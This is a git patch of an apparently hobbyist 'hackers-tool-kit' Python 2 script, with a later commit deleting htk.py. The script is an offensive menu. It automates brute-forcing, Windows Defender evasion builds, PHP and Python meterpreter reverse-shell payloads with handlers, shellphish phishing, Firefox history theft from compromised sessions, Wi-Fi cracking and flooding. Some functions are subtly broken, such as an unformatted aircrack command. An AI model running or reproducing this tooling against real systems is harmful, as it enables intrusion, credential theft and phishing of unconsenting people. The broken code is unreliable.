/root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 17430433dfbb0b1e78ba65f82a0482ee1c626296 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 2 Jun 2019 00:04:53 +0100 Subject: [PATCH 169/214] Delete htk.py --- htk.py | 3163 -------------------------------------------------------- 1 file changed, 3163 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 60d65f3..0000000 --- a/htk.py +++ /dev/null @@ -1,3163 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ 